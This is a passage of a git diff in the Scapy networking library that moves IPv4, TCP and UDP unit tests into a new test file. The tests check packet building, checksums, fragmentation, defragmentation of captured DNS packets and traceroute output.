SbZiKJCDkNdzSv2lfADAAQAAEAAAOEAEVEZ29vZ2xlLXNpdGUtdmVyaWZpY2F0aW9uPWMycnhTa2VPZUxpSG5iY24tSXhZZm5mQjJQcTQzU3lpeEVka2k2ODZlNDTADAAQAAEAAAOEADc2dj1zcGYxIGlwNDoxNjEuMTg1LjIuMC8yNSBpcDQ6MTY3LjE1My4xMzIuMC8yNSBteCAtYWxswAwALgABAAADhACbABAIAgAAA4RZab2NWWB0/SZ9A255YwNnb3YAjzLOj5HUtVGhi/emNG90g2zK80hrI6gh2d+twgVLYgWebPeTI2D2ylobevXeq5rK5RQgbg2iG1UiTBnlKPgLPYt8ZL+bi+/v5NTaqHfyHFYdKzZeL0dhrmebRbYzG7tzOllcAOOqieeO29Yr4gz1rpiU6g75vkz6yQoHNfmNVMXADAAPAAEAAAOEAAsAZAZ2d2FsbDLADMAMAA8AAQAAA4QACwBkBnZ3YWxsNMAMwAwADwABAAADhAALAAoGdndhbGwzwAzADAAPAAEAAAOEAAsACgZ2d2FsbDXADMAMAA8AAQAAA4QACwAKBnZ3YWxsNsAMwAwADwABAAADhAALAAoGdndhbGw3wAzADAAPAAEAAAOEAAsACgZ2d2FsbDjADMAMAA8AAQAAA4QACwBkBnZ3YWxsMcAMwAwALgABAAADhACbAA8IAgAAA4RZab2NWWB0/SZ9A255YwNnb3YAooXBSj6PfsdBd8sEN/2AA4cvOl2bcioO') -c = base64.b64decode('bnmYJ63mREVTUwEACABFAAFHU8UBWDIRHcMEAgIECv0DxDtlufeCT1zQktat4aEVA8MF0FO1sNbpEQtqfu5Al//OJISaRvtaArR/tLUj2CoZjS7uEnl7QpP/Ui/gR0YtyLurk9yTw7Vei0lSz4cnaOJqDiTGAKYwzVxjnoR1F3n8lplgQaOalVsHx9UAAQABAAADLAAEobkBA8epAAEAAQAAAywABKG5AQzHvwABAAEAAAMsAASnmYIMx5MAAQABAAADLAAEp5mCDcn9AAEAAQAAAqUABKeZhAvKFAABAAEAAAOEAAShuQIfyisAAQABAAADhAAEobkCKcpCAAEAAQAAA4QABKG5AjPKWQABAAEAAAOEAAShuQI9ynAAAQABAAADhAAEobkCC8nPAAEAAQAAA4QABKG5AgzJ5gABAAEAAAOEAASnmYQMAAApIAAAAAAAAAA=') -d = base64.b64decode('////////REVTUwEACABFAABOawsAAIARtGoK/QExCv0D/wCJAIkAOry/3wsBEAABAAAAAAAAIEVKRkRFQkZFRUJGQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAEAABYP/WUAAB6N4XIAAB6E4XsAAACR/24AADyEw3sAABfu6BEAAAkx9s4AABXB6j4AAANe/KEAAAAT/+wAAB7z4QwAAEuXtGgAAB304gsAABTB6z4AAAdv+JAAACCu31EAADm+xkEAABR064sAABl85oMAACTw2w8AADrKxTUAABVk6psAABnF5joAABpA5b8AABjP5zAAAAqV9WoAAAUW+ukAACGS3m0AAAEP/vAAABoa5eUAABYP6fAAABX/6gAAABUq6tUAADXIyjcAABpy5Y0AABzb4yQAABqi5V0AAFXaqiUAAEmRtm4AACrL1TQAAESzu0wAAAzs8xMAAI7LcTQAABxN47IAAAbo+RcAABLr7RQAAB3Q4i8AAAck+NsAABbi6R0AAEdruJQAAJl+ZoEAABDH7zgAACOA3H8AAAB5/4YAABQk69sAAEo6tcUAABJU7asAADO/zEAAABGA7n8AAQ9L8LMAAD1DwrwAAB8F4PoAABbG6TkAACmC1n0AAlHErjkAABG97kIAAELBvT4AAEo0tcsAABtC5L0AAA9u8JEAACBU36sAAAAl/9oAABBO77EAAA9M8LMAAA8r8NQAAAp39YgAABB874MAAEDxvw4AAEgyt80AAGwsk9MAAB1O4rEAAAxL87QAADtmxJkAAATo+xcAAAM8/MMAABl55oYAACKh3V4AACGj3lwAAE5ssZMAAC1x0o4AAAO+/EEAABNy7I0AACYp2dYAACb+2QEAABB974IAABc36MgAAA1c8qMAAAf++AEAABDo7xcAACLq3RUAAA8L8PQAAAAV/+oAACNU3KsAABBv75AAABFI7rcAABuH5HgAABAe7+EAAB++4EEAACBl35oAAB7c4SMAADgJx/YAADeVyGoAACKN3XIAAA/C8D0AAASq+1UAAOHPHjAAABRI67cAAABw/48=') - -old_debug_dissector = conf.debug_dissector -conf.debug_dissector = 0 -plist = PacketList([Ether(x) for x in [a, b, c, d]]) -conf.debug_dissector = old_debug_dissector - -left, defragmented, errored = defrag(plist) -assert len(left) == 1 -assert left[0] == Ether(d) -assert len(defragmented) == 1 -assert len(defragmented[0]) == 3093 -assert defragmented[0][DNSRR].rrname == b'nyc.gov.' -assert len(errored) == 0 - -plist_def = defragment(plist) -assert len(plist_def) == 2 -assert len(plist_def[0]) == 3093 -assert plist_def[0][DNSRR].rrname == b'nyc.gov.' - -= Packet().fragment() -payloadlen, fragsize = 100, 8 -assert fragsize % 8 == 0 -fragcount = (payloadlen // fragsize) + bool(payloadlen % fragsize) -* create the packet -pkt = IP() / ("X" * payloadlen) -* create the fragments -frags = pkt.fragment(fragsize) -* count the fragments -assert len(frags) == fragcount -* each fragment except the last one should have MF set -assert all(p.flags == 1 for p in frags[:-1]) -assert frags[-1].flags == 0 -* each fragment except the last one should have a payload of fragsize bytes -assert all(len(p.payload) == 8 for p in frags[:-1]) -assert len(frags[-1].payload) == ((payloadlen % fragsize) or fragsize) - -= Packet().fragment() and overloaded_fields -pkt1 = Ether() / IP() / UDP() -pkt2 = pkt1.fragment()[0] -pkt3 = pkt2.__class__(raw(pkt2)) -assert pkt1[IP].proto == pkt2[IP].proto == pkt3[IP].proto - -= Packet().fragment() already fragmented packets -payloadlen = 1480 * 3 -ffrags = (IP() / ("X" * payloadlen)).fragment(1480) -ffrags = reduce(lambda x, y: x + y, (pkt.fragment(1400) for pkt in ffrags)) -len(ffrags) == 6 -* each fragment except the last one should have MF set -assert all(p.flags == 1 for p in ffrags[:-1]) -assert ffrags[-1].flags == 0 -* fragment offset should be well computed -plen = 0 -for p in ffrags: - assert p.frag == plen / 8 - plen += len(p.payload) - -assert plen == payloadlen - - -############ -############ -+ TCP/IP tests -~ tcp - -= TCP options: UTO - basic build -raw(TCP(options=[("UTO", 0xffff)])) == b"\x00\x14\x00\x50\x00\x00\x00\x00\x00\x00\x00\x00\x60\x02\x20\x00\x00\x00\x00\x00\x1c\x04\xff\xff" - -= TCP options: UTO - basic dissection -uto = TCP(b"\x00\x14\x00\x50\x00\x00\x00\x00\x00\x00\x00\x00\x60\x02\x20\x00\x00\x00\x00\x00\x1c\x04\xff\xff") -uto[TCP].options[0][0] == "UTO" and uto[TCP].options[0][1] == 0xffff - -= TCP options: SAck - basic build -raw(TCP(options=[(5, b"abcdefgh")])) == b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00\x80\x02 \x00\x00\x00\x00\x00\x05\nabcdefgh\x00\x00" - -= TCP options: SAck - basic dissection -sack = TCP(b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00\x80\x02 \x00\x00\x00\x00\x00\x05\nabcdefgh\x00\x00") -sack[TCP].options[0][0] == "SAck" and sack[TCP].options[0][1] == (1633837924, 1701209960) - -= TCP options: SAckOK - basic build -raw(TCP(options=[('SAckOK', b'')])) == b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00`\x02 \x00\x00\x00\x00\x00\x04\x02\x00\x00" - -= TCP options: SAckOK - basic dissection -sackok = TCP(b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00`\x02 \x00\x00\x00\x00\x00\x04\x02\x00\x00") -sackok[TCP].options[0][0] == "SAckOK" and sackok[TCP].options[0][1] == b'' - -= TCP options: EOL - basic build -raw(TCP(options=[(0, '')])) == b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00`\x02 \x00\x00\x00\x00\x00\x00\x00\x00\x00" - -= TCP options: EOL - basic dissection -eol = TCP(b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00`\x02 \x00\x00\x00\x00\x00\x00\x02\x00\x00") -eol[TCP].options[0][0] == "EOL" and eol[TCP].options[0][1] == None - -= TCP options: malformed - build -raw(TCP(options=[('unknown', b'')])) == raw(TCP()) - -= TCP options: malformed - dissection -raw(TCP(b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00`\x02 \x00\x00\x00\x00\x00\x03\x00\x00\x00")) == b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00`\x02 \x00\x00\x00\x00\x00\x03\x00\x00\x00" - -= TCP options: wrong offset -TCP(raw(TCP(dataofs=11)/b"o")) - -= TCP options: MPTCP - basic build using bytes -raw(TCP(options=[(30, b"\x10\x03\xc1\x1c\x95\x9b\x81R_1")])) == b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00\x80\x02 \x00\x00\x00\x00\x00\x1e\x0c\x10\x03\xc1\x1c\x95\x9b\x81R_1" - -= TCP options: invalid data offset -data = b'\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00\x80\x02 \x00\x1b\xb8\x00\x00\x02\x04\x05\xb4\x04\x02\x08\x06\xf7\xa26C\x00\x00\x00\x00\x01\x03\x03\x07' -p = TCP(data) -assert TCP in p and Raw in p and len(p.options) == 3 - -= TCP options: build oversized packet - -raw(TCP(options=[('TFO', (1607681672, 2269173587)), ('AltChkSum', (81, 27688)), ('TFO', (253281879, 1218258937)), ('Timestamp', (1613741359, 4215831072)), ('Timestamp', (3856332598, 1434258666))])) - -= TCP random options -pkt = TCP() -random.seed(0x2807) -pkt = fuzz(pkt) -options = pkt.options._fix() -options -if six.PY2: - assert options == [('WScale', (32,)), ('NOP', ''), ('WScale', (145,)), ('WScale', (165,))] -else: - assert options in [[('TFO', (1822729092, 2707522527)), ('Mood', (b'\x19',)), ('WScale', (117,))], [('TFO', (725644109, 3830853589)), ('Timestamp', (2604802746, 4137267106)), ('WScale', (227,)), ('Timestamp', (38044154, 828782501)), ('AltChkSum', (126, 40603))]] - -= IP, TCP & UDP checksums (these tests highly depend on default values) -pkt = IP() / TCP() -bpkt = IP(raw(pkt)) -assert bpkt.chksum == 0x7ccd and bpkt.payload.chksum == 0x917c - -pkt = IP(len=40) / TCP() -bpkt = IP(raw(pkt)) -assert bpkt.chksum == 0x7ccd and bpkt.payload.chksum == 0x917c - -pkt = IP(len=40, ihl=5) / TCP() -bpkt = IP(raw(pkt)) -assert bpkt.chksum == 0x7ccd and bpkt.payload.chksum == 0x917c - -pkt = IP() / TCP() / ("A" * 10) -bpkt = IP(raw(pkt)) -assert bpkt.chksum == 0x7cc3 and bpkt.payload.chksum == 0x4b2c - -pkt = IP(len=50) / TCP() / ("A" * 10) -bpkt = IP(raw(pkt)) -assert bpkt.chksum == 0x7cc3 and bpkt.payload.chksum == 0x4b2c - -pkt = IP(len=50, ihl=5) / TCP() / ("A" * 10) -bpkt = IP(raw(pkt)) -assert bpkt.chksum == 0x7cc3 and bpkt.payload.chksum == 0x4b2c - -pkt = IP(options=[IPOption_RR()]) / TCP() / ("A" * 10) -bpkt = IP(raw(pkt)) -assert bpkt.chksum == 0x70bc and bpkt.payload.chksum == 0x4b2c - -pkt = IP(len=54, options=[IPOption_RR()]) / TCP() / ("A" * 10) -bpkt = IP(raw(pkt)) -assert bpkt.chksum == 0x70bc and bpkt.payload.chksum == 0x4b2c - -pkt = IP(len=54, ihl=6, options=[IPOption_RR()]) / TCP() / ("A" * 10) -bpkt = IP(raw(pkt)) -assert bpkt.chksum == 0x70bc and bpkt.payload.chksum == 0x4b2c - -pkt = IP(options=[IPOption_Timestamp()]) / TCP() / ("A" * 10) -bpkt = IP(raw(pkt)) -assert bpkt.chksum == 0x2caa and bpkt.payload.chksum == 0x4b2c - -pkt = IP() / UDP() -bpkt = IP(raw(pkt)) -assert bpkt.chksum == 0x7cce and bpkt.payload.chksum == 0x0172 - -pkt = IP(len=28) / UDP() -bpkt = IP(raw(pkt)) -assert bpkt.chksum == 0x7cce and bpkt.payload.chksum == 0x0172 - -pkt = IP(len=28, ihl=5) / UDP() -bpkt = IP(raw(pkt)) -assert bpkt.chksum == 0x7cce and bpkt.payload.chksum == 0x0172 - -pkt = IP() / UDP() / ("A" * 10) -bpkt = IP(raw(pkt)) -assert bpkt.chksum == 0x7cc4 and bpkt.payload.chksum == 0xbb17 - -pkt = IP(len=38) / UDP() / ("A" * 10) -bpkt = IP(raw(pkt)) -assert bpkt.chksum == 0x7cc4 and bpkt.payload.chksum == 0xbb17 - -pkt = IP(len=38, ihl=5) / UDP() / ("A" * 10) -bpkt = IP(raw(pkt)) -assert bpkt.chksum == 0x7cc4 and bpkt.payload.chksum == 0xbb17 - -pkt = IP(options=[IPOption_RR()]) / UDP() / ("A" * 10) -bpkt = IP(raw(pkt)) -assert bpkt.chksum == 0x70bd and bpkt.payload.chksum == 0xbb17 - -pkt = IP(len=42, options=[IPOption_RR()]) / UDP() / ("A" * 10) -bpkt = IP(raw(pkt)) -assert bpkt.chksum == 0x70bd and bpkt.payload.chksum == 0xbb17 - -pkt = IP(len=42, ihl=6, options=[IPOption_RR()]) / UDP() / ("A" * 10) -bpkt = IP(raw(pkt)) -assert bpkt.chksum == 0x70bd and bpkt.payload.chksum == 0xbb17 - -= IP with forced-length 0 -p = IP()/TCP() -p[IP].len = 0 -p = IP(raw(p)) - -assert p.len == 0 - -= IP with RawVal - -pkt = IP(src="127.0.0.1", dst="127.0.0.1", ttl=RawVal(b"\x01\x02\x03\x04")) -assert raw(pkt) == b'F\x00\x00\x18\x00\x01\x00\x00\x01\x02\xb2\xe2\x00\x00\x00\x7f\x00\x00\x01\x7f\x00\x00\x01\x00' - -= TCP payload with IP Total Length 0 -data = b'1234567890abcdef123456789ABCDEF' -pkt = IP()/TCP()/data -pkt2 = IP(raw(pkt)) -pkt2.len = 0 -pkt3 = IP(raw(pkt2)) -assert pkt3.load == data - - -= Layer binding - -* Test DestMACField & DestIPField -pkt = Ether(raw(Ether()/IP()/UDP(dport=5353)/DNS())) -assert isinstance(pkt, Ether) and pkt.dst == '01:00:5e:00:00:fb' -pkt = pkt.payload -assert isinstance(pkt, IP) and pkt.dst == '224.0.0.251' -pkt = pkt.payload -assert isinstance(pkt, UDP) and pkt.dport == 5353 -pkt = pkt.payload -assert isinstance(pkt, DNS) and isinstance(pkt.payload, NoPayload) - -* Same with IPv6 -pkt = Ether(raw(Ether()/IPv6()/UDP(dport=5353)/DNS())) -assert isinstance(pkt, Ether) and pkt.dst == '33:33:00:00:00:fb' -pkt = pkt.payload -assert isinstance(pkt, IPv6) and pkt.dst == 'ff02::fb' -pkt = pkt.payload -assert isinstance(pkt, UDP) and pkt.dport == 5353 -pkt = pkt.payload -assert isinstance(pkt, DNS) and isinstance(pkt.payload, NoPayload) - ############ ############ @@ -4231,156 +3797,6 @@ try: except BER_Decoding_Error: pass -############ -############ -+ inet.py - -= IPv4 - ICMPTimeStampField -test = ICMPTimeStampField("test", None) -value = test.any2i("", "07:28:28.07") -value == 26908070 -test.i2repr("", value) == '7:28:28.70' - -= IPv4 - UDP null checksum -IP(raw(IP()/UDP()/Raw(b"\xff\xff\x01\x6a")))[UDP].chksum == 0xFFFF - -= IPv4 - (IP|UDP|TCP|ICMP)Error -query = IP(dst="192.168.0.1", src="192.168.0.254", ttl=1)/UDP()/DNS() -answer = IP(dst="192.168.0.254", src="192.168.0.2", ttl=1)/ICMP()/IPerror(dst="192.168.0.1", src="192.168.0.254", ttl=0)/UDPerror()/DNS() - -query = IP(dst="192.168.0.1", src="192.168.0.254", ttl=1)/UDP()/DNS() -answer = IP(dst="192.168.0.254", src="192.168.0.2")/ICMP(type=11)/IPerror(dst="192.168.0.1", src="192.168.0.254", ttl=0)/UDPerror()/DNS() -assert(answer.answers(query) == True) - -query = IP(dst="192.168.0.1", src="192.168.0.254", ttl=1)/TCP() -answer = IP(dst="192.168.0.254", src="192.168.0.2")/ICMP(type=11)/IPerror(dst="192.168.0.1", src="192.168.0.254", ttl=0)/TCPerror() - -assert(answer.answers(query) == True) - -query = IP(dst="192.168.0.1", src="192.168.0.254", ttl=1)/ICMP()/"scapy" -answer = IP(dst="192.168.0.254", src="192.168.0.2")/ICMP(type=11)/IPerror(dst="192.168.0.1", src="192.168.0.254", ttl=0)/ICMPerror()/"scapy" -assert(answer.answers(query) == True) - -= IPv4 - mDNS -a = IP(dst="224.0.0.251") -assert a.hashret() == b"\x00" - -# TODO add real case here - -= IPv4 - utilities -l = overlap_frag(IP(dst="1.2.3.4")/ICMP()/("AB"*8), ICMP()/("CD"*8)) -assert(len(l) == 6) -assert([len(raw(p[IP].payload)) for p in l] == [8, 8, 8, 8, 8, 8]) -assert([(p.frag, p.flags.MF) for p in [IP(raw(p)) for p in l]] == [(0, True), (1, True), (2, True), (0, True), (1, True), (2, False)]) - -= IPv4 - traceroute utilities -ip_ttl = [("192.168.0.%d" % i, i) for i in six.moves.range(1, 10)] - -tr_packets = [ (IP(dst="192.168.0.1", src="192.168.0.254", ttl=ttl)/TCP(options=[("Timestamp", "00:00:%.2d.00" % ttl)])/"scapy", - IP(dst="192.168.0.254", src=ip)/ICMP(type=11)/IPerror(dst="192.168.0.1", src="192.168.0.254", ttl=0)/TCPerror()/"scapy") - for (ip, ttl) in ip_ttl ] - -tr = TracerouteResult(tr_packets) -assert(tr.get_trace() == {'192.168.0.1': {1: ('192.168.0.1', False), 2: ('192.168.0.2', False), 3: ('192.168.0.3', False), 4: ('192.168.0.4', False), 5: ('192.168.0.5', False), 6: ('192.168.0.6', False), 7: ('192.168.0.7', False), 8: ('192.168.0.8', False), 9: ('192.168.0.9', False)}}) - -def test_show(): - with ContextManagerCaptureOutput() as cmco: - tr = TracerouteResult(tr_packets) - tr.show() - result_show = cmco.get_output() - expected = " 192.168.0.1:tcp80 \n" - expected += "1 192.168.0.1 11 \n" - expected += "2 192.168.0.2 11 \n" - expected += "3 192.168.0.3 11 \n" - expected += "4 192.168.0.4 11 \n" - expected += "5 192.168.0.5 11 \n" - expected += "6 192.168.0.6 11 \n" - expected += "7 192.168.0.7 11 \n" - expected += "8 192.168.0.8 11 \n" - expected += "9 192.168.0.9 11 \n" - index_result = result_show.index("\n1") - index_expected = expected.index("\n1") - assert(result_show[index_result:] == expected[index_expected:]) - -test_show() - -def test_summary(): - with ContextManagerCaptureOutput() as cmco: - tr = TracerouteResult(tr_packets) - tr.summary() - result_summary = cmco.get_output() - assert(len(result_summary.split('\n')) == 10) - assert(any( - "IP / TCP 192.168.0.254:%s > 192.168.0.1:%s S / Raw ==> " - "IP / ICMP 192.168.0.9 > 192.168.0.254 time-exceeded " - "ttl-zero-during-transit / IPerror / TCPerror / " - "Raw" % (ftp_data, http) in result_summary - for ftp_data in ['21', 'ftp_data'] - for http in ['80', 'http', 'www_http', 'www'] - )) - -test_summary() - -@mock.patch("scapy.layers.inet.plt") -def test_timeskew_graph(mock_plt): - def fake_plot(data, **kwargs): - return data - mock_plt.plot = fake_plot - srl = SndRcvList([(a, a) for a in [IP(raw(p[0])) for p in tr_packets]]) - ret = srl.timeskew_graph("192.168.0.254") - assert(len(ret) == 9) - assert(ret[0][1] == 0.0) - -test_timeskew_graph() - -tr = TracerouteResult(tr_packets) -saved_AS_resolver = conf.AS_resolver -conf.AS_resolver = None -tr.make_graph() -assert(len(tr.graphdef) == 491) -tr.graphdef.startswith("digraph trace {") == True -assert(('"192.168.0.9" ->' in tr.graphdef) == True) -conf.AS_resolver = conf.AS_resolver - -pl = PacketList(list([Ether()/x for x in itertools.chain(*tr_packets)])) -srl, ul = pl.sr() -assert(len(srl) == 9 and len(ul) == 0) - -conf_color_theme = conf.color_theme -conf.color_theme = BlackAndWhite() -assert(len(pl.sessions().keys()) == 10) -conf.color_theme = conf_color_theme - -new_pl = pl.replace(IP.src, "192.168.0.254", "192.168.0.42") -assert("192.168.0.254" not in [p[IP].src for p in new_pl]) - -= IPv4 - reporting -~ netaccess - -@mock.patch("scapy.layers.inet.sr") -def test_report_ports(mock_sr): - def sr(*args, **kargs): - return [(IP()/TCP(dport=65081, flags="S"), IP()/TCP(sport=65081, flags="SA")), - (IP()/TCP(dport=65082, flags="S"), IP()/ICMP(type=3, code=1)), - (IP()/TCP(dport=65083, flags="S"), IP()/TCP(sport=65083, flags="R"))], [IP()/TCP(dport=65084, flags="S")] - mock_sr.side_effect = sr - report = "\\begin{tabular}{|r|l|l|}\n\\hline\n65081 & open & SA \\\\\n\\hline\n?? & closed & ICMP type dest-unreach/host-unreachable from 127.0.0.1 \\\\\n65083 & closed & TCP R \\\\\n\\hline\n65084 & ? & unanswered \\\\\n\\hline\n\\end{tabular}\n" - assert(report_ports("www.secdev.org", [65081,65082,65083,65084]) == report) - -test_report_ports() - -def test_IPID_count(): - with ContextManagerCaptureOutput() as cmco: - random.seed(0x2807) - IPID_count([(IP()/UDP(), IP(id=random.randint(0, 65535))/UDP()) for i in range(3)]) - result_IPID_count = cmco.get_output() - lines = result_IPID_count.split("\n") - assert(len(lines) == 5) - assert(lines[0] in ["Probably 3 classes: [4613, 53881, 58437]", - "Probably 3 classes: [9103, 9227, 46399]"]) - -test_IPID_count() - ############ ############ diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts new file mode 100644 index 00000000000..ab9fed21a54 --- /dev/null +++ b/test/scapy/layers/inet.uts @@ -0,0 +1,583 @@ +% Scapy IPv4 layers tests + +############ +############ ++ Test IP options + += IP options individual assembly +~ IP options +r = raw(IPOption()) +r +assert(r == b'\x00\x02') +r = raw(IPOption_NOP()) +r +assert(r == b'\x01') +r = raw(IPOption_EOL()) +r +assert(r == b'\x00') +r = raw(IPOption_LSRR(routers=["1.2.3.4","5.6.7.8"])) +r +assert(r == b'\x83\x0b\x04\x01\x02\x03\x04\x05\x06\x07\x08') +r = raw(IPOption_Timestamp(internet_address='192.168.15.7', timestamp=11223344)) +r +assert(r == b'D\x0c\t\x01\xc0\xa8\x0f\x07\x00\xabA0') +r = raw(IPOption_Timestamp(flg=0, length=8)) +r +assert(r == b'D\x08\t\x00\x00\x00\x00\x00') + += IP options individual dissection +~ IP options +io = IPOption(b"\x00") +io +assert(io.option == 0 and isinstance(io, IPOption_EOL)) +io = IPOption(b"\x01") +io +assert(io.option == 1 and isinstance(io, IPOption_NOP)) +lsrr=b'\x83\x0b\x04\x01\x02\x03\x04\x05\x06\x07\x08' +p=IPOption_LSRR(lsrr) +p +q=IPOption(lsrr) +q +assert(p == q) + += IP assembly and dissection with options +~ IP options +p = IP(src="9.10.11.12",dst="13.14.15.16",options=IPOption_SDBM(addresses=["1.2.3.4","5.6.7.8"]))/TCP() +r = raw(p) +r +assert(r == b'H\x00\x004\x00\x01\x00\x00@\x06\xa2q\t\n\x0b\x0c\r\x0e\x0f\x10\x95\n\x01\x02\x03\x04\x05\x06\x07\x08\x00\x00\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00_K\x00\x00') +q=IP(r) +q +assert( isinstance(q.options[0],IPOption_SDBM) ) +assert( q[IPOption_SDBM].addresses[1] == "5.6.7.8" ) +p.options[0].addresses[0] = '5.6.7.8' +assert( IP(raw(p)).options[0].addresses[0] == '5.6.7.8' ) +p = IP(src="9.10.11.12", dst="13.14.15.16", options=[IPOption_NOP(),IPOption_LSRR(routers=["1.2.3.4","5.6.7.8"]),IPOption_Security(transmission_control_code="XYZ")])/TCP() +p +r = raw(p) +r +assert(r == b'K\x00\x00@\x00\x01\x00\x00@\x06\xf3\x83\t\n\x0b\x0c\r\x0e\x0f\x10\x01\x83\x0b\x04\x01\x02\x03\x04\x05\x06\x07\x08\x82\x0b\x00\x00\x00\x00\x00\x00XYZ\x00\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00_K\x00\x00') +q = IP(r) +q +assert(q[IPOption_LSRR].get_current_router() == "1.2.3.4") +assert(q[IPOption_Security].transmission_control_code == b"XYZ") +assert(q[TCP].flags == 2) + + +############ +############ ++ Sessions + += IPSession - dissect fragmented IP packets on-the-flow +packet = IP()/("data"*1000) +frags = fragment(packet) +tmp_file = get_temp_file() +wrpcap(tmp_file, frags) + +dissected_packets = [] +def callback(pkt): + dissected_packets.append(pkt) + +sniff(offline=tmp_file, session=IPSession, prn=callback) +assert len(dissected_packets) == 1 +assert raw(dissected_packets[0]) == raw(packet) + += StringBuffer + +buffer = StringBuffer() +assert not buffer + +buffer.append(b"kie", 5) +buffer.append(b"e", 11) +buffer.append(b"pi", 2) +buffer.append(b"pi", 9) +buffer.append(b"n", 4) + +assert bytes_hex(bytes(buffer)) == b'0070696e6b696500706965' +assert len(buffer) == 11 +assert buffer + + +############ +############ ++ Test fragment() / defragment() functions + += fragment() +payloadlen, fragsize = 100, 8 +assert fragsize % 8 == 0 +fragcount = (payloadlen // fragsize) + bool(payloadlen % fragsize) +* create the packet +pkt = IP() / ("X" * payloadlen) +* create the fragments +frags = fragment(pkt, fragsize) +* count the fragments +assert len(frags) == fragcount +* each fragment except the last one should have MF set +assert all(p.flags == 1 for p in frags[:-1]) +assert frags[-1].flags == 0 +* each fragment except the last one should have a payload of fragsize bytes +assert all(len(p.payload) == 8 for p in frags[:-1]) +assert len(frags[-1].payload) == ((payloadlen % fragsize) or fragsize) + += fragment() and overloaded_fields +pkt1 = Ether() / IP() / UDP() +pkt2 = fragment(pkt1)[0] +pkt3 = pkt2.__class__(raw(pkt2)) +assert pkt1[IP].proto == pkt2[IP].proto == pkt3[IP].proto + += fragment() already fragmented packets +payloadlen = 1480 * 3 +ffrags = fragment(IP() / ("X" * payloadlen), 1480) +ffrags = fragment(ffrags, 1400) +len(ffrags) == 6 +* each fragment except the last one should have MF set +assert all(p.flags == 1 for p in ffrags[:-1]) +assert ffrags[-1].flags == 0 +* fragment offset should be well computed +plen = 0 +for p in ffrags: + assert p.frag == plen // 8 + plen += len(p.payload) + +assert plen == payloadlen + += fragment() with non-multiple-of-8 MTU +paylen = 1400 + 1 +frags1 = fragment(IP() / ("X" * paylen), paylen) +assert len(frags1) == 1 +frags2 = fragment(IP() / ("X" * (paylen + 1)), paylen) +assert len(frags2) == 2 +assert len(frags2[0]) == 20 + paylen - paylen % 8 +assert len(frags2[1]) == 20 + 1 + paylen % 8 + += defrag() +nonfrag, unfrag, badfrag = defrag(frags) +assert not nonfrag +assert not badfrag +assert len(unfrag) == 1 + += defragment() +defrags = defragment(frags) +* we should have one single packet +assert len(defrags) == 1 +* which should be the same as pkt reconstructed +assert defrags[0] == IP(raw(pkt)) + += defragment() uses timestamp of last fragment +payloadlen, fragsize = 100, 8 +assert fragsize % 8 == 0 +packet = Ether()/IP()/("X" * payloadlen) +frags = fragment(packet, fragsize) +for i,frag in enumerate(frags): + frag.time -= 100 + i + +last_time = max(frag.time for frag in frags) +defrags = defragment(frags) +assert defrags[0].time == last_time +nonfrag, defrags, badfrag = defrag(frags) +assert defrags[0].time == last_time + += defragment() - Missing fragments + +pkts = fragment(IP(dst="10.0.0.5")/ICMP()/("X"*1500)) +assert len(defragment(pkts[1:])) == 1 + += defrag() / defragment() - Real DNS packets + +import base64 + +a = base64.b64decode('bnmYJ63mREVTUwEACABFAAV0U8UgADIR+u0EAgIECv0DxAA1sRIL83Z7gbCBgAABAB0AAAANA255YwNnb3YAAP8AAcAMAAYAAQAAA4QAKgZ2d2FsbDDADApob3N0bWFzdGVywAx4Og5wAAA4QAAADhAAJOoAAAACWMAMAC4AAQAAA4QAmwAGCAIAAAOEWWm9jVlgdP0mfQNueWMDZ292AHjCDBL0C1rEKUjsuG6Zg3+Rs6gj6llTABm9UZnWk+rRu6nPqW4N7AEllTYqNK+r6uFJ2KhfG3MDPS1F/M5QCVR8qkcbgrqPVRBJAG67/ZqpGORppQV6ib5qqo4ST5KyrgKpa8R1fWH8Fyp881NWLOZekM3TQyczcLFrvw9FFjdRwAwAAQABAAADhAAEobkenMAMAC4AAQAAA4QAmwABCAIAAAOEWWm9jVlgdP0mfQNueWMDZ292ABW8t5tEv9zTLdB6UsoTtZIF6Kx/c4ukIud8UIGM0XdXnJYx0ZDyPDyLVy2rfwmXdEph3KBWAi5dpRT16nthlMmWPQxD1ecg9rc8jcaTGo8z833fYJjzPT8MpMTxhapu4ANSBVbv3LRBnce2abu9QaoCdlHPFHdNphp6JznCLt4jwAwAMAABAAADhAEIAQEDCAMBAAF77useCfI+6T+m6Tsf2ami8/q5XDtgS0Ae7F0jUZ0cpyYxy/28DLFjJaS57YiwAYaabkkugxsoSv9roqBNZjD+gjoUB+MK8fmfaqqkSOgQuIQLZJeOORWD0gAj8mekw+S84DECylbKyYEGf8CB3/59IfV+YkTcHhXBYrMNxhMK1Eiypz4cgYxXiYUSz7jbOmqE3hU2GinhRmNW4Trt4ImUruSO+iQbTTj6LtCtIsScOF4vn4gcLJURLHOs+mf1NU9Yqq9mPC9wlYZk+8rwqcjVIiRpDmmv83huv4be1x1kkz2YqTFwtc33Fzt6SZk96Qtk2wCgg8ZQqLKGx5uwIIyrwAwAMAABAAADhAEIAQEDCAMBAAGYc7SWbSinSc3u8ZcYlO0+yZcJD1vqC5JARxZjKNzszHxc9dpabBtR9covySVu1YaBVrlxNBzfyFd4PKyjvPcBER5sQImoCikC+flD5NwXJbnrO1SG0Kzp8XXDCZpBASxuBF0vjUSU9yMqp0FywCrIfrbfCcOGAFIVP0M2u8dVuoI4nWbkRFc0hiRefoxc1O2IdpR22GAp2OYeeN2/tnFBz/ZMQitU2IZIKBMybKmWLC96tPcqVdWJX6+M1an1ox0+NqBZuPjsCx0/lZbuB/rLHppJOmkRc7q2Fw/tpHOyWHV+ulCfXem9Up/sbrMcP7uumFz0FeNhBPtg3u5kA5OVwAwAMAABAAADhACIAQADCAMBAAF5mlzmmq8cs6Hff0qZLlGKYCGPl